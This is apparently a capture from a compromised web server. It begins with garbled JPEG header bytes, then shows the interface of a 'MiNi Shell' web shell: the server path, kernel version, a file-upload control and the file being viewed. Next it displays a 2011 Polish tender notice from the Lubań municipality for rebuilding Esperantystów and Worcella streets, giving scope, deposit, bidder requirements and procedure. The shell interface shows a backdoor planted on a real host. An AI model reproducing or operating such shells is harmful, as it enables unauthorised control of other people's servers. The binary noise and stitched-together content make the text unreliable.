JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110516/115314-N-2011.html

<p class="kh_header"><b>Lubań: PRZEBUDOWA NAWIERZCHNI CIĄGU DRÓG GMINNYCH NR 108941 D 
- UL. ESPERANTYSTÓW I NR 108945 D - UL. WORCELLA W LUBANIU</b><br>
<b>Numer ogłoszenia: 115314 - 2011; data zamieszczenia: 16.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Lubań , ul. 7 Dywizji 14, 59-800 Lubań, woj. dolnośląskie, tel. 075 6464400, faks 075 6464405.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.luban.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA NAWIERZCHNI CIĄGU DRÓG GMINNYCH NR 108941 D 
- UL. ESPERANTYSTÓW I NR 108945 D - UL. WORCELLA W LUBANIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PRZEBUDOWA NAWIERZCHNI CIĄGU DRÓG GMINNYCH NR 108941 D 
- UL. ESPERANTYSTÓW I NR 108945 D - UL. WORCELLA W LUBANIU W RAMACH PROGRAMU WIELOLETNIEGO POD NAZWĄ NARODOWY PROGRAM PRZEBUDOWY DRÓG LOKALNYCH 2008-2011
Przedmiotem zamówienia jest wykonanie przebudowy ciągu dróg gminnych Nr 108941D 
- ul. Esperantystów i Nr 108945D - ul. Worcella w Lubaniu. 
Ciąg komunikacyjny tych dróg stanowi połączenie z drogą powiatową 2432D 
- ul. Łużycką w Lubaniu.
Łączna długość przebudowywanego ciągu dróg wynosi 909,00 mb. 
Projektowane szerokości jezdni wynoszą: 7,00m, 7,50m oraz 6,00m.
Na odcinku 0+000 - 0+569 przewiduje się frezowanie istniejącej nawierzchni mineralno-bitumicznej jezdni i jej nierówności, roboty rozbiórkowe nawierzchni bitumicznej chodników oraz ich obramowania krawężnikami i obrzeżami betonowymi.
W ramach planowanej przebudowy, przewiduje się na tym odcinku ustawienie nowych krawężników na ławie betonowej z oporem i obrzeży betonowych posadowionych na ławie betonowej. 
Na istniejącej jezdni po wykonaniu warstwy profilującej z masy mineralno-bitumicznej i jej skropieniu emulsją asfaltową zostanie ułożona warstwa ścieralna z mieszanki mastyksowo-grysowej (SMA).
W przypadku chodników projektuje się wykonanie warstwy profilującej z piasku, 
a następnie wykonanie  nawierzchni z kostki brukowej betonowej grubości 6cm na podsypce piaskowej chodników.
Na odcinku 0+210 - 0+290 po stronie lewej, po wykonanych robotach rozbiórkowych, dodatkowo należy sfrezować korzenie drzew. Po wykonaniu tych prac wykonana zostanie  podbudowa z kruszywa łamanego frakcji 0-31,5mm grubości 10cm, a następnie ułożona nawierzchnia chodnika z kostki betonowej grubości 6cm na podsypce piaskowej.
W miejscach gdzie chodniki posiadają nawierzchnię z kostki betonowej należy dokonać przełożenia nawierzchni chodników z kostki brukowej betonowej do zgodnych z projektem rzędnych wysokości wraz z ewentualnym jej uzupełnieniem.
Na odcinku 0+569 - 0+889 przewiduje się sfrezowanie istniejącej nawierzchni mineralno-bitumicznej oraz części istniejącej podbudowy betonowej jezdni drogi, rozebranie nawierzchni bitumicznych chodników oraz obramowania z krawężników i obrzeży betonowych.
Po wykonaniu robót rozbiórkowych planuje się ułożenie nowych krawężników betonowych na ławie betonowej z oporem i obrzeży betonowych posadowionych na ławie betonowej.
Dodatkowo na tym odcinku drogi planuje się poszerzenie istniejącej jezdni o 0,50 mb do szerokości 6,00 m poprzez wykonanie koryta na poszerzeniu i wykonanie nowej podbudowy z mieszanek kamiennych dwuwarstwowo łącznej grubości 30 cm. 
Po wykonaniu tych robót na całej szerokości jezdni wraz z jej poszerzeniem należy ułożyć warstwę wiążącą z masy bitumicznej grubości 5,00 cm. Po dokonaniu skropienia warstwy wiążącej zostanie ułożona warstwa ścieralna nawierzchni z mieszanki mastyksowo-grysowej (SMA) grubości 4,00 cm. 
Na skrzyżowaniu ulicy Esperantystów z ulicą Klasztorną w km 0+569 - 0+595 przed ułożeniem warstw bitumicznych nawierzchni jezdni przewidziano wymianę podłoża 
i warstw konstrukcyjnych podbudowy na głębokość 1,00 mb, z uwagi na powstały 
w jezdni przełom ciężki. Planuje się w tym miejscu wykonanie robót ziemnych 
z wywozem urobku, wymianę gruntu w miejscu przełomu z użyciem mieszanki żwirowo - piaskowej i wzmocnienie podłoża geowłókniną. Następnie zostanie wykonana nowa podbudowa z mieszanek kamiennych - dwuwarstwowa o łącznej grubości 30 cm.    
W przypadku istniejących chodników należy po ich rozbiórce wykonać warstwę profilującą istniejącej podsypki piaskowej i następnie ułożyć nawierzchnię z kostki brukowej betonowej grubości 6cm.               
Na odcinku 0+889 - 0+909 opracowanie przewiduje wykonanie koryta pod drogę 
i jednostronny chodnik na całej szerokości z wywiezieniem urobku, ułożenie nowych krawężników na ławie betonowej z oporem i obrzeży betonowych na ławie betonowej, wykonanie podbudowy jezdni z kruszywa łamanego o grubości łącznej - 30cm (z kruszywa łamanego frakcji:  0-63mm - 15 cm, 0-31,5mm - 15 cm), wykonanie nawierzchni mineralno-bitumicznej o łącznej grubości 9cm (warstwa wiążąca - 5cm, warstwa ścieralna - 4cm SMA) z wykonaniem skropienia między jej warstwami emulsją asfaltową. Chodnik z kostki betonowej grub. 6 cm na podsypce piaskowej należy wykonać na wcześniej wykonanej warstwie odcinającej z piasku grub. 6 cm i podbudowie z mieszanki kamiennej grub. 10 cm.
Nawierzchnię zjazdów do posesji zlokalizowanych w ciągu chodników należy wykonać, po wcześniejszym przygotowaniu koryta pod ich konstrukcję z wywozem urobku, na podbudowie  z mieszanki kamiennej grubości 15cm, a następnie ułożeniu nawierzchni z kostki brukowej betonowej grubości 8cm na podsypce piaskowej.
Wszystkie projektowane parkingi należy wykonać po wcześniejszym przygotowaniu koryta pod ich konstrukcję z wywozem urobku z wykopów, a następnie wykonać podbudowę z kruszywa łamanego grubości 15cm. Nawierzchnię parkingów stanowić będzie betonowa kostka brukowa  grubości 8cm układana na podsypce piaskowej 8 cm.
W miejscach skrzyżowań jezdni z dojściami i wjazdami  na przyległe do drogi posesje oraz w miejscach zlokalizowanych parkingów i przejść dla pieszych, należy zastosować obniżenia krawężników (krawężniki najazdowe) oraz obrzeży betonowych.
W jezdni na odcinku od km 0+569 - 0+909 zostanie wykonany obustronny ściek przykrawężnikowy z kostki betonowej grub.8 cm na ławie betonowej szerokości 0,20 m.
Nawierzchnię parkingów i zjazdów na drogi boczne należy wykonać z kostki betonowej koloru czerwonego, linie segregacyjne na parkingach z kostki betonowej koloru szarego.
Nawierzchnie chodników wykonane zostaną z kostki betonowej koloru szarego, z tym że pas przykrawężnikowy szerokości 0,20 m zostanie wykonany z kostki betonowej koloru czerwonego.
W ramach przebudowy przewiduje również regulację istniejących w jezdni i chodnikach urządzeń obcych: studni rewizyjnych kanalizacyjnych, studni telekomunikacyjnych, wpustów ulicznych a także zasuw wodnych i gazowych. 
Planuje się również częściową przebudowę istniejących studni rewizyjnych poprzez wymianę zniszczonych płyt nastudziennych wraz z montażem pierścieni odciążających i włazów żeliwnych. 
Na części istniejących studzienek ściekowych przewiduje się wymianę wpustów żeliwnych. 
W ramach oznakowania ciągu dróg gminnych przewiduje się wymianę oznakowania pionowego zgodnie z posiadanymi przez Inwestora planami docelowej organizacji ruchu oraz po wykonaniu nawierzchni bitumicznej wykonanie oznakowania poziomego przejść dla pieszych farbą chlorokauczukową.

W ramach inwestycji przewidziano również przebudowę istniejących linii kablowych napowietrznych oraz słupów kratowych oświetlenia ulicznego. 
Zakres przebudowy oświetlenia ulicznego przewiduje:
-	demontaż istniejących słupów oświetleniowych kratowych oraz napowietrznej linii zasilającej;
-	wykonanie linii kablowej zasilającej długość 988,0 mb, z tego ułożonej w rurach ochronnych  860mb;
-	ustawienie nowych punktów oświetlenia ulicznego w ilości 28 kompletów, poprzez montaż słupów oświetleniowych  stalowych sześciokątnych ocynkowanych typu SX 6/3 lub równoważnych, z wysięgnikiem W16   lub równoważnym, z oprawą uliczną OUS 6 lub równoważną, źródłem światła sodowym np.   typu SON 100 W na prefabrykowanym fundamencie betonowym typu np. B-120; 
- montaż szafki sterowniczej oświetlenia drogowego na fundamencie betonowym przystosowanej do wprowadzenia dwóch obwodów oświetleniowych. 
Sterowanie oświetleniem odbywać się będzie za pomocą zegara sterującego 
z programem załączeń. Układ pomiarowo - rozliczeniowy poprzez licznik dwutaryfowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  dopuszcza udzielenie zamówienia uzupełniającego w trybie zamówienia z wolnej ręki - na zasadach określonych w art.67 ust.1 pkt.6 ustawy Prawo zamówień publicznych .</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.53-7, 45.23.32.50-6, 45.22.33.00-9, 45.23.23.11-6, 45.11.27.10-5, 45.23.14.00-9, 45.31.61.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda zabezpieczenia oferty wadium w wysokości 50.000 zł (pięćdziesiąt tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie 
w oparciu o złożone przez Wykonawcę oświadczenie o spełnienie warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, że w okresie ostatnich 5 lat przed upływem terminu składania ofert 
(a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonali zgodnie ze sztuką budowlaną i prawidłowo ukończyli, co najmniej trzy roboty budowlane o wartości minimum 1.500.000,00 złotych brutto. 
Warunek będzie spełniony jeżeli Wykonawca wykaże, że zakres robót wykazanych przez Wykonawcę obejmował między innymi roboty związane z budową lub przebudową:
- jezdni dróg z użyciem masy mineralno-bitumicznej, 
- chodników, ciągów pieszo-jezdnych, parkingów z użyciem kostki betonowej,
- terenów zielonych, 
- elementów sieci kanalizacji deszczowej, 
- oświetlenia ulicznego, 
- montaż elementów małej architektury.
Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie 
w oparciu o złożone przez Wykonawcę:
a)	wykaz robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku (wiedzy i doświadczenia), wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania,
b)	dokumenty potwierdzające, że wymienione w wykazie roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np.: referencje, listy polecające, opinie inspektora nadzoru, protokół odbioru robót itp.);
c)	oświadczenie o spełnieniu warunków udziału w postępowaniu,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie 
w oparciu o złożone przez Wykonawcę oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować dysponowanie niżej wymienionymi osobami, które będą uczestniczyć w wykonywaniu zamówienia 
- kierownik budowy posiadający odpowiednie wykształcenie techniczne i praktykę zawodową potwierdzone uprawnieniami budowlanymi w odpowiedniej specjalności.
- kierownicy robót posiadający odpowiednie wykształcenie techniczne i praktykę zawodową potwierdzone uprawnieniami budowlanymi w specjalności:
    a) instalacji sanitarnych;
   b) instalacji elektrycznych (obwody i instalacje n/n do 1 kV oświetlenia dróg, 
       placów i ulic);
Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie 
w oparciu o złożone przez Wykonawcę:
a)	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, 
w szczególności odpowiedzialnych za kierowanie robotami wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, oraz informacją o podstawie do dysponowania tymi osobami, b)	oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia  (wymienione w wykazie osoby) posiadają wymagane uprawnienia. Zamawiający nie wymaga kserokopii uprawnień 
i zaświadczeń o przynależności do właściwej izby samorządu zawodowego. 
c)	oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować ubezpieczenie od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności na kwotę równą lub wyższą niż 500.000 zł.
Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie 
w oparciu o złożone przez Wykonawcę:
a)	opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę równą lub wyższą niż 1.000.000 zł. Jeżeli z treści polisy nie wynika fakt jej opłacenia do oferty należy dołączyć dokument potwierdzający opłacenie polisy, 
b)	oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz Oferty, 2)	Kosztorysy ofertowe uproszczone. Zamawiajacy zaleca aby Oferent załączył kosztorysy ofertowe w wersji elektronicznej na płycie CD;
3)	stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z  właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej,
4)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego, 
5)	zobowiązanie innych podmiotów wskazanych w ofercie do współpracy lub oddania mu do dyspoozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (jeżeli dotyczy).

6)	Zalecane jest dołączenie do oferty dowodu wniesienia wadium,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art.144 u.p.z.p. Zamawiający dopuszcza zmiany postanowień umowy 
         w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:
	1) zlecenie robót dodatkowych i zamiennych związanych z: 
     a) aktualizacją lub zmianą dokumentacji projektowej,  
                 b) istotnymi wadami lub/i brakami dokumentacji projektowej,
     c) wystąpieniem okoliczności niemożliwych do przewidzenia, przez 
                     zamawiającego i doświadczonego wykonawcę przed podpisaniem umowy,
     d) rezygnacją z części prac, ograniczenia zakresu umowy podstawowej w sytuacji, 
                    gdy zmiany te będą korzystne dla zamawiającego.
2)  zmiana terminu wykonania zamówienia oraz harmonogramu rzeczowo- 
     finansowego realizacji robót:
     a) w przypadku zlecenia robót dodatkowych i zamiennych,
b)	spowodowane warunkami atmosferycznymi, w szczególności klęskami żywiołowymi, warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót budowlanych, zgodnie z wymogami technologicznymi,
c)	spowodowane wstrzymaniem robót przez zamawiającego, 
d)	spowodowane koniecznością usunięcia błędów lub wprowadzenia zmian 
w dokumentacji projektowej, 
e)	spowodowane przekazanie placu budowy z opóźnieniem.
f)	spowodowane innymi przyczynami zewnętrznymi niezależnymi od zamawiającego i wykonawcy skutkujące niemożliwością uzyskania stosownych decyzji, zezwoleń, uzgodnień itp.
3)	zmiany osobowe, przy pomocy których wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnymi uprawnieniami 
i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach, a także w SIWZ w przypadku:
a)	śmierci, choroby lub innych zdarzeń losowych osób, 
b)	nie wywiązywania się osób z obowiązków wynikających z umowy, 
c)	rezygnacji tych osób z wykonywania swoich obowiązków.
            4) zmiana podwykonawcy robót przy pomocy, którego wykonawca realizuje 
                 przedmiot umowy, na innego w przypadku:
                 a) nie wywiązywania się podwykonawców wskazanych w ofercie wykonawcy ze 
                     swoich obowiązków,
                 b) rezygnacji tych podwykonawców z wykonywania swych obowiązków.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um-luban.dolnyslask.pl/index.php?idmp=22&r=r<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Wydziału Inwestycji                       i Gospodarki Komunalnej Urzędu Miasta Lubań - w Lubaniu przy Placu Lompy 1, pokój              nr 9  (I piętro).</p>
